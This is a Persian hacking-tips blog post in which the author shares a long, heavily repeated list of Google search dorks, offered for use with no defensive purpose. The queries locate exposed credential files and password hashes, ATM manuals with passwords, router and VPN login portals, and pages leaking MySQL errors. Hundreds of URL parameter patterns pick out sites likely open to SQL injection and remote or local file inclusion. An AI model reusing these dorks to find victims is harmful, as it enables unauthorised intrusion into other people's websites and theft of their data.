علم کامپیوتر

ترفند های کامپیوتر همگانی
طبقه بندی موضوعی
محبوب ترین مطالب
 • ۰۱ بهمن ۹۴ پیشنهاد ویژه
 • ۰۶ اسفند ۹۴ آموزش c++
 • ۱۷ اسفند ۹۴ انگری آی پی
 • ۱۹ فروردين ۹۵ هک ایمیل با هویج
 • ۲۸ اسفند ۹۴ بازی سازی 2Dgame makare
 • ۳۱ فروردين ۹۵ اسپمر تلگرام
 • ۲۶ اسفند ۹۴ آموزش کرک کردن
 • ۱۷ اسفند ۹۴ مک آی پی چیست؟


 • علم کامپیوتر

  این وبلاگا ساختم سطح کامپیوتر هر کس که خواست بالا بره.
  اگر هم کسی سطح کامپیوترش بالا بود میخوام جزء نویسندگان قرار بگیرد.

  نویسندگان


  علم کامپیوتر

  ترفند های کامپیوتر همگانی


  سه شنبه, ۱۱ اسفند ۱۳۹۴، ۰۶:۴۷ ب.ظ

  امروز  مجموعه دورک هایی که تو کامپیوترم بودا براتون میزارم

  filetype:log intext:org.apache.hadoop.hdfs

  inurl:cgi-bin/mailgraph.cgi

  inurl:logon.html "CSCOE"

  (intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)

  intitle:FRITZ!Box inurl:login.lua

  intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)

  dcid= bn= pin code=

  intitle:"virtual office" sonicwall domain

  ext:cgi inurl:cgi-bin intext:#!/bin/bash

  "automatic teller" "operator manual" "password" filetype:pdf

  intitle:"BadBlue: the file-sharing harchizi ke az server lazem darin"

  intext:"Target Multicast Group" "beacon"

  intitle:"Apache Status" "Apache Server Status for"

  inurl:wl.exe inurl:?SS1= intext:"Operating system:" -edu -gov -mil

  inurl:"cgi-bin/passwd.txt"

   

   

  inurl:"page=" & intext:"Warning: mysql_fetch_array()"
  inurl:"id=" & intext:"Warning: mysql_fetch_array()"
  inurl:"sida=" & intext:"Warning: mysql_fetch_array()"
  inurl:"=" & intext:"Warning: mysql_fetch_array()"
  inurl:"=" & intext:"You have an error in your SQL syntax"
  inurl:"sida=" & intext:"You have an error in your SQL syntax"
  inurl:"id=" & intext:"You have an error in your SQL syntax"
  inurl:"page=" & intext:"You have an error in your SQL syntax"
  inurl:index.php?id=
  inurl:trainers.php?id=
  inurl:buy.php?category=
  inurl:article.php?ID=
  inurl:play_old.php?id=
  inurl:declaration_more.php?decl_id=
  inurl:Pageid=
  inurl:games.php?id=
  inurl:page.php?file=
  inurl:newsDetail.php?id=
  inurl:gallery.php?id=
  inurl:article.php?id=
  inurl:show.php?id=
  inurl:staff_id=
  inurl:newsitem.php?num=
  inurl:readnews.php?id=
  inurl:top10.php?cat=
  inurl:historialeer.php?num=
  inurl:reagir.php?num=
  inurl:forum_bds.php?num=
  inurl:game.php?id=
  inurl:view_product.php?id=
  inurl:newsone.php?id=
  inurl:sw_comment.php?id=
  inurl:news.php?id=
  inurl:avd_start.php?avd=
  inurl:event.php?id=
  inurl:product-item.php?id=
  inurl:sql.php?id=
  inurl:news_view.php?id=
  inurl:select_biblio.php?id=
  inurl:humor.php?id=
  inurl:aboutbook.php?id=
  inurl:fiche_spectacle.php?id=
  inurl:communique_detail.php?id=
  inurl:sem.php3?id=
  inurl:kategorie.php4?id=
  inurl:news.php?id=
  inurl:index.php?id=
  inurl:faq2.php?id=
  inurl:show_an.php?id=
  inurl:preview.php?id=
  inurl:loadpsb.php?id=
  inurl:opinions.php?id=
  inurl:spr.php?id=
  inurl:pages.php?id=
  inurl:announce.php?id=
  inurl:clanek.php4?id=
  inurl:participant.php?id=
  inurl:download.php?id=
  inurl:main.php?id=
  inurl:review.php?id=
  inurl:chappies.php?id=
  inurl:read.php?id=
  inurl:prod_detail.php?id=
  inurl:viewphoto.php?id=
  inurl:article.php?id=
  inurl:person.php?id=
  inurl:productinfo.php?id=
  inurl:showimg.php?id=
  inurl:view.php?id=
  inurl:website.php?id=
  inurl:hosting_info.php?id=
  inurl:gallery.php?id=
  inurl:rub.php?idr=
  inurl:view_faq.php?id=
  inurl:artikelinfo.php?id=
  inurl:detail.php?ID=
  inurl:index.php?=
  inurl:profile_view.php?id=
  inurl:category.php?id=
  inurl:publications.php?id=
  inurl:fellows.php?id=
  inurl:downloads_info.php?id=
  inurl:prod_info.php?id=
  inurl:shop.php?do=part&id=
  inurl:Productinfo.php?id=
  inurl:collectionitem.php?id=
  inurl:band_info.php?id=
  inurl:product.php?id=
  inurl:releases.php?id=
  inurl:ray.php?id=
  inurl:produit.php?id=
  inurl:pop.php?id=
  inurl:shopping.php?id=
  inurl:productdetail.php?id=
  inurl:post.php?id=
  inurl:viewshowdetail.php?id=
  inurl:clubpage.php?id=
  inurl:memberInfo.php?id=
  inurl:section.php?id=
  inurl:theme.php?id=
  inurl:page.php?id=
  inurl:shredder-categories.php?id=
  inurl:tradeCategory.php?id=
  inurl:product_ranges_view.php?ID=
  inurl:shop_category.php?id=
  inurl:transcript.php?id=
  inurl:channel_id=
  inurl:item_id=
  inurl:newsid=
  inurl:trainers.php?id=
  inurl:news-full.php?id=
  inurl:news_display.php?getid=
  inurl:index2.php?option=
  inurl:readnews.php?id=
  inurl:top10.php?cat=
  inurl:newsone.php?id=
  inurl:event.php?id=
  inurl:product-item.php?id=
  inurl:sql.php?id=
  inurl:aboutbook.php?id=
  inurl:review.php?id=
  inurl:loadpsb.php?id=
  inurl:ages.php?id=
  inurl:material.php?id=
  inurl:clanek.php4?id=
  inurl:announce.php?id=
  inurl:chappies.php?id=
  inurl:read.php?id=
  inurl:viewapp.php?id=
  inurl:viewphoto.php?id=
  inurl:rub.php?idr=
  inurl:galeri_info.php?l=
  inurl:review.php?id=
  inurl:iniziativa.php?in=
  inurl:curriculum.php?id=
  inurl:labels.php?id=
  inurl:story.php?id=
  inurl:look.php?ID=
  inurl:newsone.php?id=
  inurl:aboutbook.php?id=
  inurl:material.php?id=
  inurl:opinions.php?id=
  inurl:announce.php?id=
  inurl:rub.php?idr=
  inurl:galeri_info.php?l=
  inurl:tekst.php?idt=
  inurl:newscat.php?id=
  inurl:newsticker_info.php?idn=
  inurl:rubrika.php?idr=
  inurl:rubp.php?idr=
  inurl:offer.php?idf=
  inurl:art.php?idm=
  inurl:title.php?id=
  trainers.php?id=
  article.php?ID=
  play_old.php?id=
  declaration_more.php?decl_id=
  Pageid=
  games.php?id=
  newsDetail.php?id=
  staff_id=
  historialeer.php?num=
  product-item.php?id=
  news_view.php?id=
  humor.php?id=
  communique_detail.php?id=
  sem.php3?id=
  opinions.php?id=
  spr.php?id=
  pages.php?id=
  chappies.php?id=
  prod_detail.php?id=
  viewphoto.php?id=
  view.php?id=
  website.php?id=
  hosting_info.php?id=
  gery.php?id=
  detail.php?ID=
  publications.php?id=
  Productinfo.php?id=
  releases.php?id=
  ray.php?id=
  produit.php?id=
  pop.php?id=
  shopping.php?id=
  productdetail.php?id=
  post.php?id=
  section.php?id=
  theme.php?id=
  page.php?id=
  shredder-categories.php?id=
  product_ranges_view.php?ID=
  shop_category.php?id=
  channel_id=
  newsid=
  news_display.php?getid=
  ages.php?id=
  clanek.php4?id=
  review.php?id=
  iniziativa.php?in=
  curriculum.php?id=
  labels.php?id=
  look.php?ID=
  galeri_info.php?l=
  tekst.php?idt=
  newscat.php?id=
  newsticker_info.php?idn=
  rubrika.php?idr=
  offer.php?idf=
  "id=" & intext:"Warning: mysql_fetch_array()
  "id=" & intext:"Warning: getimagesize()
  "id=" & intext:"Warning: session_start()
  "id=" & intext:"Warning: mysql_num_rows()
  "id=" & intext:"Warning: mysql_query()
  "id=" & intext:"Warning: array_merge()
  "id=" & intext:"Warning: preg_match()
  "id=" & intext:"Warning: ilesize()
  "id=" & intext:"Warning: filesize()
  index.php?id=
  buy.php?category=
  article.php?ID=
  play_old.php?id=
  newsitem.php?num=
  top10.php?cat=
  historialeer.php?num=
  reagir.php?num=
  Stray-Questions-View.php?num=
  forum_bds.php?num=
  game.php?id=
  view_product.php?id=
  sw_comment.php?id=
  news.php?id=
  avd_start.php?avd=
  event.php?id=
  sql.php?id=
  news_view.php?id=
  select_biblio.php?id=
  humor.php?id=
  ogl_inet.php?ogl_id=
  fiche_spectacle.php?id=
  communique_detail.php?id=
  sem.php3?id=
  kategorie.php4?id=
  faq2.php?id=
  show_an.php?id=
  preview.php?id=
  loadpsb.php?id=
  opinions.php?id=
  spr.php?id=
  announce.php?id=
  participant.php?id=
  download.php?id=
  main.php?id=
  review.php?id=
  chappies.php?id=
  read.php?id=
  prod_detail.php?id=
  article.php?id=
  person.php?id=
  productinfo.php?id=
  showimg.php?id=
  view.php?id=
  website.php?id=
  hosting_info.php?id=
  gery.php?id=
  rub.php?idr=
  view_faq.php?id=
  artikelinfo.php?id=
  detail.php?ID=
  index.php?=
  profile_view.php?id=
  category.php?id=
  publications.php?id=
  fellows.php?id=
  downloads_info.php?id=
  prod_info.php?id=
  shop.php?do=part&id=
  collectionitem.php?id=
  band_info.php?id=
  product.php?id=
  releases.php?id=
  ray.php?id=
  produit.php?id=
  pop.php?id=
  shopping.php?id=
  productdetail.php?id=
  post.php?id=
  viewshowdetail.php?id=
  clubpage.php?id=
  memberInfo.php?id=
  section.php?id=
  theme.php?id=
  page.php?id=
  shredder-categories.php?id=
  tradeCategory.php?id=
  product_ranges_view.php?ID=
  shop_category.php?id=
  transcript.php?id=
  channel_id=
  item_id=
  newsid=
  trainers.php?id=
  news-full.php?id=
  news_display.php?getid=
  index2.php?option=
  readnews.php?id=
  newsone.php?id=
  product-item.php?id=
  pages.php?id=
  clanek.php4?id=
  viewapp.php?id=
  viewphoto.php?id=
  galeri_info.php?l=
  iniziativa.php?in=
  curriculum.php?id=
  labels.php?id=
  story.php?id=
  look.php?ID=
  aboutbook.php?id=
  "id=" & intext:"Warning: mysql_fetch_assoc()
  "id=" & intext:"Warning: is_writable()
  "id=" & intext:"Warning: Unknown()
  "id=" & intext:"Warning: mysql_result()
  "id=" & intext:"Warning: pg_exec()
  "id=" & intext:"Warning: require()
  buy.php?category=
  pageid=
  page.php?file=
  show.php?id=
  newsitem.php?num=
  readnews.php?id=
  top10.php?cat=
  reagir.php?num=
  Stray-Questions-View.php?num=
  forum_bds.php?num=
  game.php?id=
  view_product.php?id=
  sw_comment.php?id=
  news.php?id=
  avd_start.php?avd=
  event.php?id=
  sql.php?id=
  select_biblio.php?id=
  ogl_inet.php?ogl_id=
  fiche_spectacle.php?id=
  kategorie.php4?id=
  faq2.php?id=
  show_an.php?id=
  loadpsb.php?id=
  announce.php?id=
  participant.php?id=
  download.php?id=
  article.php?id=
  person.php?id=
  productinfo.php?id=
  showimg.php?id=
  rub.php?idr=
  view_faq.php?id=
  artikelinfo.php?id=
  index.php?=
  profile_view.php?id=
  category.php?id=
  fellows.php?id=
  downloads_info.php?id=
  prod_info.php?id=
  shop.php?do=part&id=
  collectionitem.php?id=
  band_info.php?id=
  product.php?id=
  viewshowdetail.php?id=
  clubpage.php?id=
  memberInfo.php?id=
  tradeCategory.php?id=
  transcript.php?id=
  item_id=
  news-full.php?id=
  aboutbook.php?id=
  preview.php?id=
  material.php?id=
  read.php?id=
  viewapp.php?id=
  story.php?id=
  newsone.php?id=
  rubp.php?idr=
  art.php?idm=
  title.php?id=
  index1.php?modo=
  include.php?*[*]*=
  nota.php?pollname=
  index3.php?p=
  padrao.php?pre=
  home.php?pa=
  main.php?type=
  sitio.php?start=
  *.php?include=
  general.php?xlink=
  show.php?go=
  nota.php?ki=
  down*.php?oldal=
  layout.php?disp=
  enter.php?chapter=
  base.php?incl=
  enter.php?mod=
  show.php?corpo=
  head.php?*[*]*=
  info.php?strona=
  template.php?str=
  main.php?doshow=
  view.php?*[*]*=
  index.php?to=
  page.php?cmd=
  view.php?b=
  info.php?option=
  show.php?x=
  template.php?texto=
  index3.php?ir=
  print.php?chapter=
  file.php?inc=
  file.php?cont=
  view.php?cmd=
  include.php?chapter=
  path.php?my=
  principal.php?param=
  general.php?menue=
  index1.php?b=
  info.php?chapter=
  nota.php?chapter=
  general.php?include=
  start.php?addr=
  index1.php?qry=
  index1.php?loc=
  page.php?addr=
  index1.php?dir=
  principal.php?pr=
  press.php?seite=
  head.php?cmd=
  home.php?sec=
  home.php?category=
  standard.php?cmd=
  mod*.php?thispage=
  base.php?to=
  view.php?choix=
  base.php?panel=
  template.php?mod=
  info.php?j=
  blank.php?pref=
  sub*.php?channel=
  standard.php?in=
  general.php?cmd=
  pagina.php?panel=
  template.php?where=
  path.php?channel=
  gery.php?seccion=
  page.php?tipo=
  sitio.php?rub=
  pagina.php?u=
  file.php?ir=
  *inc*.php?sivu=
  path.php?start=
  page.php?chapter=
  home.php?recipe=
  enter.php?pname=
  layout.php?path=
  print.php?open=
  mod*.php?channel=
  down*.php?phpbb_root_path=
  *inc*.php?str=
  gery.php?phpbb_root_path=
  include.php?middlePart=
  sub*.php?destino=
  info.php?read=
  home.php?sp=
  main.php?strona=
  sitio.php?get=
  sitio.php?index=
  index3.php?option=
  enter.php?a=
  main.php?second=
  print.php?pname=
  blank.php?itemnav=
  blank.php?pagina=
  index1.php?d=
  down*.php?where=
  *inc*.php?include=
  path.php?pre=
  home.php?loader=
  start.php?eval=
  index.php?disp=
  head.php?mod=
  sitio.php?section=
  nota.php?doshow=
  home.php?seite=
  home.php?a=
  page.php?url=
  pagina.php?left=
  layout.php?c=
  principal.php?goto=
  standard.php?base_dir=
  home.php?where=
  page.php?sivu=
  *inc*.php?adresa=
  padrao.php?str=
  include.php?my=
  show.php?home=
  index.php?load=
  index3.php?rub=
  sub*.php?str=
  start.php?index=
  nota.php?mod=
  sub*.php?mid=
  index1.php?*[*]*=
  pagina.php?oldal=
  padrao.php?loc=
  padrao.php?rub=
  page.php?incl=
  gery.php?disp=
  nota.php?oldal=
  include.php?u=
  principal.php?pagina=
  print.php?choix=
  head.php?filepath=
  include.php?corpo=
  sub*.php?action=
  head.php?pname=
  press.php?dir=
  show.php?xlink=
  file.php?left=
  nota.php?destino=
  general.php?module=
  index3.php?redirect=
  down*.php?param=
  default.php?ki=
  padrao.php?h=
  padrao.php?read=
  mod*.php?cont=
  index1.php?l=
  down*.php?pr=
  gery.php?viewpage=
  template.php?load=
  nota.php?pr=
  padrao.php?destino=
  index2.php?channel=
  principal.php?opcion=
  start.php?str=
  press.php?*[*]*=
  index.php?ev=
  pagina.php?pre=
  nota.php?content=
  include.php?adresa=
  sitio.php?t=
  index.php?sivu=
  principal.php?q=
  path.php?ev=
  print.php?module=
  index.php?loc=
  nota.php?basepath=
  padrao.php?tipo=
  index2.php?in=
  principal.php?eval=
  file.php?qry=
  info.php?t=
  enter.php?play=
  general.php?var=
  principal.php?s=
  standard.php?pagina=
  standard.php?subject=
  base.php?second=
  head.php?inc=
  pagina.php?basepath=
  main.php?pname=
  *inc*.php?modo=
  include.php?goto=
  file.php?pg=
  head.php?g=
  general.php?header=
  start.php?*root*=
  enter.php?pref=
  index3.php?open=
  start.php?module=
  main.php?load=
  enter.php?pg=
  padrao.php?redirect=
  pagina.php?my=
  gery.php?pre=
  enter.php?w=
  info.php?texto=
  enter.php?open=
  base.php?rub=
  gery.php?*[*]*=
  include.php?cmd=
  standard.php?dir=
  layout.php?page=
  index3.php?pageweb=
  include.php?numero=
  path.php?destino=
  index3.php?home=
  default.php?seite=
  path.php?eval=
  base.php?choix=
  template.php?cont=
  info.php?pagina=
  default.php?x=
  default.php?option=
  gery.php?ki=
  down*.php?second=
  blank.php?path=
  pagina.php?v=
  file.php?pollname=
  index3.php?var=
  layout.php?goto=
  pagina.php?incl=
  home.php?action=
  include.php?oldal=
  print.php?left=
  print.php?u=
  nota.php?v=
  home.php?str=
  press.php?panel=
  page.php?mod=
  default.php?param=
  down*.php?texto=
  mod*.php?dir=
  view.php?where=
  blank.php?subject=
  path.php?play=
  base.php?l=
  index2.php?rub=
  general.php?opcion=
  layout.php?xlink=
  padrao.php?name=
  pagina.php?nivel=
  default.php?oldal=
  template.php?k=
  main.php?chapter=
  layout.php?chapter=
  layout.php?incl=
  include.php?url=
  base.php?sivu=
  index.php?link=
  sub*.php?cont=
  info.php?oldal=
  general.php?rub=
  default.php?str=
  head.php?ev=
  sub*.php?path=
  view.php?page=
  main.php?j=
  index2.php?basepath=
  gery.php?qry=
  main.php?url=
  default.php?incl=
  show.php?redirect=
  index1.php?pre=
  general.php?base_dir=
  start.php?in=
  show.php?abre=
  index1.php?home=
  home.php?ev=
  index2.php?ki=
  base.php?pag=
  default.php?ir=
  general.php?qry=
  index2.php?home=
  press.php?nivel=
  enter.php?pr=
  blank.php?loader=
  start.php?cmd=
  padrao.php?d=
  sitio.php?recipe=
  principal.php?read=
  standard.php?showpage=
  main.php?pg=
  page.php?panel=
  press.php?addr=
  template.php?s=
  main.php?tipo=
  *inc*.php?ev=
  padrao.php?page=
  show.php?thispage=
  home.php?secao=
  main.php?start=
  enter.php?mid=
  press.php?id=
  main.php?inc=
  index3.php?cmd=
  index.php?pname=
  press.php?subject=
  include.php?sec=
  index3.php?xlink=
  general.php?texto=
  index3.php?go=
  index.php?cmd=
  index3.php?disp=
  index3.php?left=
  sub*.php?middle=
  show.php?modo=
  index1.php?pagina=
  head.php?left=
  enter.php?phpbb_root_path=
  show.php?z=
  start.php?basepath=
  blank.php?strona=
  template.php?y=
  page.php?where=
  layout.php?category=
  index1.php?my=
  principal.php?phpbb_root_path=
  nota.php?channel=
  page.php?choix=
  start.php?xlink=
  home.php?k=
  standard.php?phpbb_root_path=
  principal.php?middlePart=
  mod*.php?m=
  index.php?recipe=
  template.php?path=
  pagina.php?dir=
  sitio.php?abre=
  index1.php?recipe=
  blank.php?page=
  sub*.php?category=
  *inc*.php?body=
  enter.php?middle=
  home.php?path=
  down*.php?pre=
  base.php?w=
  main.php?path=
  nota.php?ir=
  press.php?link=
  gery.php?pollname=
  down*.php?open=
  down*.php?pageweb=
  default.php?eval=
  view.php?showpage=
  show.php?get=
  sitio.php?tipo=
  layout.php?cont=
  default.php?destino=
  padrao.php?seccion=
  down*.php?r=
  main.php?param=
  standard.php?e=
  down*.php?in=
  nota.php?include=
  sitio.php?secao=
  print.php?my=
  general.php?abre=
  general.php?link=
  default.php?id=
  standard.php?panel=
  show.php?channel=
  enter.php?r=
  index3.php?phpbb_root_path=
  gery.php?where=
  head.php?middle=
  sub*.php?load=
  gery.php?sp=
  show.php?chapter=
  sub*.php?b=
  general.php?adresa=
  print.php?goto=
  sub*.php?sp=
  template.php?doshow=
  padrao.php?base_dir=
  index2.php?my=
  include.php?w=
  start.php?op=
  main.php?section=
  view.php?header=
  layout.php?menue=
  head.php?y=
  sub*.php?content=
  show.php?type=
  base.php?id=
  mod*.php?qry=
  default.php?strona=
  sitio.php?chapter=
  gery.php?index=
  nota.php?h=
  page.php?oldal=
  enter.php?panel=
  blank.php?t=
  start.php?pollname=
  sub*.php?module=
  enter.php?thispage=
  mod*.php?index=
  sitio.php?r=
  sub*.php?play=
  index2.php?doshow=
  index2.php?chapter=
  show.php?path=
  gery.php?to=
  info.php?base_dir=
  gery.php?abre=
  gery.php?pag=
  view.php?channel=
  default.php?mod=
  index.php?op=
  general.php?pre=
  padrao.php?type=
  template.php?pag=
  standard.php?pre=
  blank.php?ref=
  down*.php?z=
  general.php?inc=
  home.php?read=
  pagina.php?section=
  default.php?basepath=
  index.php?pre=
  sitio.php?pageweb=
  base.php?seite=
  *inc*.php?j=
  index2.php?filepath=
  file.php?type=
  index1.php?oldal=
  index2.php?second=
  index3.php?sekce=
  info.php?filepath=
  base.php?opcion=
  path.php?category=
  index3.php?start=
  start.php?rub=
  *inc*.php?i=
  blank.php?pre=
  general.php?channel=
  index2.php?OpenPage=
  page.php?section=
  mod*.php?middle=
  index1.php?goFile=
  blank.php?action=
  principal.php?loader=
  sub*.php?op=
  main.php?addr=
  start.php?mid=
  gery.php?secao=
  pagina.php?tipo=
  index.php?w=
  head.php?where=
  principal.php?tipo=
  press.php?loader=
  gery.php?showpage=
  gery.php?go=
  enter.php?start=
  press.php?lang=
  general.php?p=
  index.php?sekce=
  index2.php?get=
  sitio.php?go=
  include.php?cont=
  sub*.php?where=
  index3.php?index=
  path.php?recipe=
  info.php?loader=
  print.php?sp=
  page.php?phpbb_root_path=
  path.php?body=
  principal.php?menue=
  print.php?cont=
  pagina.php?z=
  default.php?mid=
  blank.php?xlink=
  sub*.php?oldal=
  general.php?b=
  include.php?left=
  print.php?sivu=
  press.php?OpenPage=
  default.php?cont=
  general.php?pollname=
  template.php?nivel=
  enter.php?page=
  file.php?middle=
  standard.php?str=
  gery.php?get=
  main.php?v=
  down*.php?subject=
  enter.php?sivu=
  path.php?option=
  index.php?strona=
  index1.php?choix=
  index2.php?f=
  press.php?destino=
  pagina.php?channel=
  principal.php?b=
  home.php?include=
  head.php?numero=
  general.php?ref=
  main.php?dir=
  gery.php?cont=
  principal.php?type=
  file.php?param=
  default.php?secao=
  path.php?pageweb=
  info.php?r=
  base.php?phpbb_root_path=
  main.php?itemnav=
  view.php?pg=
  pagina.php?choix=
  default.php?itemnav=
  index2.php?cmd=
  layout.php?url=
  index.php?path=
  index1.php?second=
  start.php?modo=
  index1.php?get=
  index3.php?my=
  sub*.php?left=
  print.php?inc=
  view.php?type=
  path.php?*[*]*=
  base.php?adresa=
  index3.php?oldal=
  standard.php?body=
  base.php?path=
  principal.php?strona=
  info.php?l=
  template.php?left=
  head.php?loc=
  page.php?ir=
  print.php?path=
  down*.php?path=
  sitio.php?opcion=
  pagina.php?category=
  press.php?menu=
  index2.php?pref=
  sitio.php?incl=
  show.php?ki=
  index3.php?x=
  page.php?strona=
  *inc*.php?open=
  index3.php?secao=
  standard.php?*[*]*=
  template.php?basepath=
  standard.php?goFile=
  index2.php?ir=
  file.php?modo=
  gery.php?itemnav=
  main.php?oldal=
  down*.php?showpage=
  start.php?destino=
  blank.php?rub=
  path.php?ir=
  layout.php?var=
  index1.php?texto=
  start.php?pg=
  index1.php?showpage=
  info.php?go=
  path.php?load=
  index3.php?abre=
  blank.php?where=
  info.php?start=
  page.php?secao=
  nota.php?pag=
  nota.php?second=
  index2.php?to=
  standard.php?name=
  start.php?strona=
  mod*.php?numero=
  press.php?home=
  info.php?z=
  mod*.php?path=
  blank.php?base_dir=
  base.php?texto=
  nota.php?secc=
  index.php?tipo=
  index.php?goto=
  print.php?pag=
  view.php?secao=
  general.php?strona=
  show.php?my=
  page.php?e=
  padrao.php?index=
  gery.php?thispage=
  start.php?base_dir=
  default.php?tipo=
  gery.php?panel=
  standard.php?ev=
  standard.php?destino=
  general.php?middle=
  main.php?basepath=
  standard.php?q=
  index1.php?tipo=
  mod*.php?choix=
  template.php?ir=
  show.php?adresa=
  general.php?mid=
  index3.php?adresa=
  pagina.php?sec=
  template.php?secao=
  home.php?w=
  general.php?content=
  sub*.php?recipe=
  main.php?category=
  enter.php?viewpage=
  main.php?ir=
  show.php?pageweb=
  principal.php?ir=
  default.php?pageweb=
  index.php?oldal=
  head.php?d=
  gery.php?mid=
  index.php?type=
  standard.php?j=
  show.php?oldal=
  enter.php?link=
  enter.php?content=
  blank.php?filepath=
  standard.php?channel=
  base.php?*[*]*=
  info.php?incl=
  down*.php?include=
  press.php?modo=
  file.php?choix=
  press.php?type=
  blank.php?goto=
  index3.php?showpage=
  principal.php?subject=
  start.php?chapter=
  show.php?r=
  pagina.php?thispage=
  general.php?chapter=
  page.php?base_dir=
  page.php?qry=
  show.php?incl=
  page.php?*[*]*=
  main.php?h=
  file.php?seccion=
  default.php?pre=
  principal.php?index=
  principal.php?inc=
  home.php?z=
  pagina.php?in=
  show.php?play=
  nota.php?subject=
  default.php?secc=
  default.php?loader=
  padrao.php?var=
  mod*.php?b=
  default.php?showpage=
  press.php?channel=
  pagina.php?ev=
  sitio.php?name=
  page.php?option=
  press.php?mid=
  down*.php?corpo=
  view.php?get=
  print.php?thispage=
  principal.php?home=
  show.php?param=
  standard.php?sivu=
  index3.php?panel=
  include.php?play=
  path.php?cmd=
  file.php?sp=
  template.php?section=
  view.php?str=
  blank.php?left=
  nota.php?lang=
  path.php?sivu=
  main.php?e=
  default.php?ref=
  start.php?seite=
  default.php?inc=
  print.php?disp=
  home.php?h=
  principal.php?loc=
  index3.php?sp=
  gery.php?var=
  sub*.php?base_dir=
  path.php?middle=
  pagina.php?str=
  base.php?play=
  base.php?v=
  sitio.php?sivu=
  main.php?r=
  file.php?nivel=
  start.php?sivu=
  template.php?c=
  general.php?second=
  sub*.php?mod=
  home.php?loc=
  head.php?corpo=
  standard.php?op=
  index2.php?inc=
  info.php?pref=
  base.php?basepath=
  print.php?basepath=
  *inc*.php?m=
  base.php?home=
  layout.php?strona=
  padrao.php?url=
  sitio.php?oldal=
  pagina.php?read=
  index1.php?go=
  standard.php?s=
  page.php?eval=
  index.php?j=
  pagina.php?pr=
  start.php?secao=
  template.php?*[*]*=
  nota.php?get=
  index3.php?link=
  home.php?e=
  gery.php?name=
  nota.php?eval=
  sub*.php?abre=
  index2.php?load=
  principal.php?in=
  view.php?load=
  mod*.php?action=
  default.php?p=
  head.php?c=
  template.php?viewpage=
  view.php?mid=
  padrao.php?addr=
  view.php?go=
  file.php?basepath=
  home.php?pre=
  include.php?goFile=
  layout.php?play=
  index1.php?subject=
  info.php?middlePart=
  down*.php?pg=
  sub*.php?body=
  index.php?option=
  sub*.php?chapter=
  default.php?t=
  head.php?opcion=
  nota.php?panel=
  sitio.php?left=
  show.php?include=
  pagina.php?start=
  head.php?choix=
  index3.php?tipo=
  index3.php?choix=
  down*.php?channel=
  base.php?pa=
  nota.php?sekce=
  show.php?l=
  show.php?index=
  blank.php?url=
  start.php?thispage=
  nota.php?play=
  show.php?second=
  enter.php?include=
  principal.php?middle=
  main.php?where=
  padrao.php?link=
  path.php?strona=
  index3.php?read=
  mod*.php?module=
  standard.php?viewpage=
  standard.php?pr=
  *inc*.php?showpage=
  pagina.php?ref=
  path.php?pname=
  padrao.php?mid=
  info.php?eval=
  include.php?path=
  page.php?subject=
  sub*.php?qry=
  head.php?module=
  nota.php?opcion=
  head.php?abre=
  base.php?str=
  home.php?body=
  gery.php?module=
  head.php?sivu=
  page.php?inc=
  pagina.php?header=
  mod*.php?v=
  home.php?doshow=
  padrao.php?n=
  index1.php?chapter=
  padrao.php?basepath=
  index.php?r=
  index3.php?seccion=
  sitio.php?mid=
  index.php?where=
  general.php?type=
  pagina.php?goto=
  page.php?pa=
  default.php?menue=
  main.php?goto=
  index1.php?abre=
  info.php?seccion=
  index2.php?pa=
  layout.php?pageweb=
  nota.php?disp=
  index1.php?body=
  default.php?nivel=
  show.php?header=
  down*.php?pag=
  start.php?tipo=
  standard.php?w=
  index.php?open=
  blank.php?menu=
  general.php?nivel=
  padrao.php?nivel=
  *inc*.php?addr=
  index.php?var=
  home.php?redirect=
  *inc*.php?link=
  *inc*.php?incl=
  padrao.php?corpo=
  down*.php?url=
  enter.php?goto=
  down*.php?addr=
  sub*.php?j=
  principal.php?f=
  sub*.php?menue=
  index2.php?section=
  general.php?my=
  head.php?loader=
  general.php?goto=
  include.php?dir=
  start.php?header=
  blank.php?in=
  base.php?name=
  nota.php?goFile=
  head.php?base_dir=
  mod*.php?recipe=
  press.php?pr=
  padrao.php?*[*]*=
  layout.php?opcion=
  print.php?rub=
  index.php?pr=
  general.php?seite=
  pagina.php?numero=
  *inc*.php?pg=
  nota.php?rub=
  view.php?seite=
  pagina.php?recipe=
  index.php?pref=
  page.php?action=
  page.php?ev=
  show.php?ir=
  head.php?index=
  mod*.php?pname=
  view.php?ir=
  *inc*.php?start=
  principal.php?rub=
  principal.php?corpo=
  padrao.php?middle=
  base.php?pname=
  template.php?header=
  view.php?sp=
  main.php?name=
  nota.php?m=
  blank.php?open=
  head.php?dir=
  page.php?pname=
  *inc*.php?k=
  index.php?pollname=
  head.php?oldal=
  index1.php?str=
  template.php?choix=
  down*.php?pollname=
  page.php?recipe=
  template.php?corpo=
  nota.php?sec=
  info.php?*[*]*=
  sub*.php?*[*]*=
  page.php?q=
  index1.php?type=
  gery.php?y=
  standard.php?lang=
  gery.php?page=
  index.php?action=
  press.php?pname=
  down*.php?v=
  index3.php?second=
  show.php?recipe=
  main.php?pre=
  file.php?numero=
  print.php?str=
  standard.php?link=
  nota.php?OpenPage=
  view.php?pollname=
  print.php?l=
  index.php?go=
  standard.php?numero=
  view.php?pr=
  down*.php?read=
  down*.php?action=
  index1.php?OpenPage=
  principal.php?left=
  mod*.php?start=
  file.php?body=
  gery.php?pg=
  blank.php?qry=
  base.php?eval=
  default.php?left=
  gery.php?param=
  blank.php?pa=
  nota.php?b=
  path.php?loader=
  start.php?o=
  include.php?include=
  nota.php?corpo=
  enter.php?second=
  sub*.php?pname=
  mod*.php?pageweb=
  principal.php?addr=
  standard.php?action=
  template.php?lang=
  include.php?basepath=
  sub*.php?ir=
  down*.php?nivel=
  path.php?opcion=
  print.php?category=
  print.php?menu=
  layout.php?secao=
  template.php?param=
  standard.php?ref=
  base.php?include=
  blank.php?body=
  path.php?pref=
  print.php?g=
  padrao.php?subject=
  nota.php?modo=
  index3.php?loader=
  template.php?seite=
  general.php?pageweb=
  index2.php?param=
  path.php?nivel=
  page.php?pref=
  press.php?pref=
  enter.php?ev=
  standard.php?middle=
  index2.php?recipe=
  blank.php?dir=
  home.php?pageweb=
  view.php?panel=
  down*.php?home=
  head.php?ir=
  mod*.php?ir=
  show.php?pagina=
  default.php?base_dir=
  show.php?loader=
  path.php?mid=
  blank.php?abre=
  down*.php?choix=
  info.php?opcion=
  page.php?loader=
  principal.php?oldal=
  index1.php?load=
  home.php?content=
  pagina.php?sekce=
  file.php?n=
